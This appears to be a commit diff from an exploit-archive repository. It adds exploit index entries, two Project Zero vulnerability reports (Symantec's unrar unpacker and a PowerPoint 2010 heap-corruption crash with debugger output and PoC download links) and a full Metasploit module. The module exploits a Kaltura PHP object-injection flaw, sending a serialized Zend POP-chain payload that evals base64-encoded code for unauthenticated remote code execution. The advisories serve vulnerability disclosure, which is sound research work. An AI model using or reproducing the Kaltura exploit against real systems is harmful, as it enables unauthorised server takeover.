33851,platforms/php/webapps/33851.txt,"WordPress Theme TimThumb 2.8.13 WebShot Plugin/ - Remote Code Execution",2014-06-24,@u0x,php,webapps,0
33851,platforms/php/webapps/33851.txt,"Multiple WordPress Plugins (Using TimThumb 2.8.13 / WordThumb 1.07) - 'WebShot' Remote Code Execution",2014-06-24,@u0x,php,webapps,0
33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 - Source Code Information Disclosure",2010-04-22,"Veerendra G.G",multiple,remote,0
33860,platforms/windows/dos/33860.html,"Microsoft Internet Explorer 8 / 9 / 10 - CInput Use-After-Free Crash PoC (MS14-035)",2014-06-24,"Drozdova Liudmila",windows,dos,0
33854,platforms/php/webapps/33854.txt,"vBulletin Two-Step External Link Module - 'externalredirect.php' Cross-Site Scripting",2010-04-20,"Edgard Chammas",php,webapps,0

Can't render this file because it is too large.

0
platforms/linux/dos/19117.c → platforms/bsd/dos/19117.c
View file

0
platforms/multiple/dos/19423.c → platforms/bsd/dos/19423.c
View file

0
platforms/unix/remote/22131.pl → platforms/bsd/remote/22131.pl
View file

13
platforms/multiple/dos/40405.txt Executable file
View file

@ -0,0 +1,13 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=867
In issue 810 we pointed out to Symantec that they hadn't updated their unrar based unpacker for years, and it was vulnerable to dozens of publicly documented flaws.
I had expected Symantec to rebase on 5.4.2 (the latest version as of this writing), but they appear to have just backported fixes for the few issues I sent them.
Here are two known bugs in unrar that are fixed upstream, but not in Symantec's ancient code. If they continue to refuse to rebase, this might take a few iterations to shake the bugs out. Sigh.
As in issue 810, these are remote code execution vulnerabilities at the highest possible privilege level.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40405.zip

101
platforms/php/remote/40404.rb Executable file
View file

@ -0,0 +1,101 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Kaltura Remote PHP Code Execution',
'Description' => %q{
This module exploits an Object Injection vulnerability in Kaltura.
By exploiting this vulnerability, unauthenticated users can execute
arbitrary code under the context of the web server user.
Kaltura has a module named keditorservices that takes user input
and then uses it as an unserialized function parameter. The constructed
object is based on the SektionEins Zend code execution POP chain PoC,
with a minor modification to ensure Kaltura processes it and the
Zend_Log function's __destruct() method is called. Kaltura versions
prior to 11.1.0-2 are affected by this issue.
This module was tested against Kaltura 11.1.0 installed on CentOS 6.8.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Security-Assessment.com', # discovery
'Mehmet Ince <mehmet@mehmetince.net>' # msf module
],
'References' =>
[
['EDB', '39563']
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => 'Mar 15 2016',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The target URI of the Kaltura installation', '/'])
]
)
end
def check
r = rand_text_alpha(15 + rand(4))
cmd = "print_r(#{r}).die()"
p = ""
p << "a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";"
p << "a:1:{i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\00*\00_eventsToMail\";"
p << "a:1:{i:0;i:1;}s:22:\"\00*\00_layoutEventsToMail\";a:0:{}s:8:\"\00*\00_mail\";"
p << "O:9:\"Zend_Mail\":0:{}s:10:\"\00*\00_layout\";O:11:\"Zend_Layout\":3:{s:13:\"\00*\00_inflector\";"
p << "O:23:\"Zend_Filter_PregReplace\":2:{s:16:\"\00*\00_matchPattern\";s:7:\"/(.*)/e\";"
p << "s:15:\"\00*\00_replacement\";s:#{cmd.length.to_s}:\"#{cmd}\";}s:20:\"\00*\00_inflectorEnabled\";"
p << "b:1;s:10:\"\00*\00_layout\";s:6:\"layout\";}s:22:\"\00*\00_subjectPrependText\";N;}}};}"
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php/keditorservices/redirectWidgetCmd'),
'vars_get' => {
'kdata' => Rex::Text.encode_base64(p)
}
)
if res && res.body.include?(r)
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def exploit
cmd = "print_r(eval(base64_decode('#{Rex::Text.encode_base64(payload.encode)}'))).die()"
p = ""
p << "a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";"
p << "a:1:{i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\00*\00_eventsToMail\";"
p << "a:1:{i:0;i:1;}s:22:\"\00*\00_layoutEventsToMail\";a:0:{}s:8:\"\00*\00_mail\";"
p << "O:9:\"Zend_Mail\":0:{}s:10:\"\00*\00_layout\";O:11:\"Zend_Layout\":3:{s:13:\"\00*\00_inflector\";"
p << "O:23:\"Zend_Filter_PregReplace\":2:{s:16:\"\00*\00_matchPattern\";s:7:\"/(.*)/e\";"
p << "s:15:\"\00*\00_replacement\";s:#{cmd.length.to_s}:\"#{cmd}\";}s:20:\"\00*\00_inflectorEnabled\";"
p << "b:1;s:10:\"\00*\00_layout\";s:6:\"layout\";}s:22:\"\00*\00_subjectPrependText\";N;}}};}"
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php/keditorservices/redirectWidgetCmd'),
'vars_get' => {
'kdata' => Rex::Text.encode_base64(p)
}
)
end
end

86
platforms/windows/dos/40406.txt Executable file
View file

@ -0,0 +1,86 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=866
The following crash was observed in Microsoft PowerPoint 2010 running under Windows 7 x86 with application verifier enabled.
File versions are:
mso.dll: 14.0.7166.5000
ppcore.dll: 14.0.7168.5000
Attached crashing file: 3525170180.ppt
Crashing context:
eax=1979aea0 ebx=1638bb50 ecx=1979aea0 edx=0024e340 esi=00000000 edi=00000000
eip=663088d8 esp=0024e330 ebp=0024e330 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
ppcore!DllGetLCID+0x18205e:
663088d8 ff7110 push dword ptr [ecx+10h] ds:0023:1979aeb0=????????
Call Stack:
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0024e330 663088cc 1979aea0 0024e46c 00000000 ppcore!DllGetLCID+0x18205e
0024e350 663072cb 0024e46c e437cde4 00000000 ppcore!DllGetLCID+0x182052
0024e4c8 662fcbda 1cd76fe8 0024e4f0 0024e574 ppcore!DllGetLCID+0x180a51
0024e598 662fc9ee 00000000 0024e5e0 0024e63e ppcore!DllGetLCID+0x176360
0024e5ac 662e82fd 0024e5e0 0024e63e e4362e14 ppcore!DllGetLCID+0x176174
00250738 662e7c88 17802ef8 073def40 1638bb50 ppcore!DllGetLCID+0x161a83
00250774 6619d3e9 002508a4 00250890 1638bb50 ppcore!DllGetLCID+0x16140e
Disassembly:
663088d2 55 push ebp
663088d3 8bec mov ebp,esp
663088d5 8b4d08 mov ecx,dword ptr [ebp+8]
663088d8 ff7110 push dword ptr [ecx+10h] ds:0023:1979aeb0=????????
The ecx register is pointing to invalid memory in this crash. Looking at the call stack and disassembly above we can see that this value was passed in as the first argument to the crashing function. The calling function obtained this value from a pointer in stack memory at 0x0024e46c + 0x10:
0:000> dd poi(0024e46c)
1cb7cfa0 00000000 1cb7cfa0 00000002 19045ea0
1cb7cfb0 1979aea0 00000000 00000000 00000000
We can verify that this is allocated memory and find the function that allocated it:
(address changed between runs and is now 0x1cb7cfa0)
0:000> !heap -p -a 1cb7cfa0
address 1cb7cfa0 found in
_DPH_HEAP_ROOT @ 1261000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
1d2b14e0: 1cb7cfa0 5c - 1cb7c000 2000
6f748e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
7719616e ntdll!RtlDebugAllocateHeap+0x00000030
7715a08b ntdll!RtlpAllocateHeap+0x000000c4
77125920 ntdll!RtlAllocateHeap+0x0000023a
72eaad1a vrfcore!VerifierSetAPIClassName+0x000000aa
701f16ac vfbasics+0x000116ac
641a6cca mso!Ordinal149+0x000078e0
66118132 ppcore!PPMain+0x00001244
662fcbda ppcore!DllGetLCID+0x00176360
662fc9ee ppcore!DllGetLCID+0x00176174
662e82fd ppcore!DllGetLCID+0x00161a83
Setting breakpoints on ppcore!DllGetLCID+0x00176360 and subsequent memory write access breakpoints at eax+0x10 (there are multiple hits) eventually resulted in the same file crashing with a different context:
eax=00000000 ebx=17c2cb50 ecx=00000000 edx=00000000 esi=1a36eea0 edi=1a36eea0
eip=6625a361 esp=0022e1d0 ebp=0022e1f8 iopl=0 nv up ei ng nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210293
ppcore!DllGetLCID+0xd3ae7:
6625a361 8b4870 mov ecx,dword ptr [eax+70h] ds:0023:00000070=????????
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0022e1f8 662d7d30 661813c4 ec3f4e62 00000000 ppcore!DllGetLCID+0xd3ae7
0022e220 663088e2 00000000 661813c4 0022e250 ppcore!DllGetLCID+0x1514b6
0022e230 663088cc 1a36eea0 0022e36c 00000000 ppcore!DllGetLCID+0x182068
0022e250 663072cb 0022e36c ec3f4f8a 00000000 ppcore!DllGetLCID+0x182052
0022e3c8 662fcbda 1c7a4fe8 0022e3f0 0022e474 ppcore!DllGetLCID+0x180a
Given the different crashing contexts related to timing when breakpoints are set I suspect this to be a heap corruption bug that Application Verifier does not detect.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40406.zip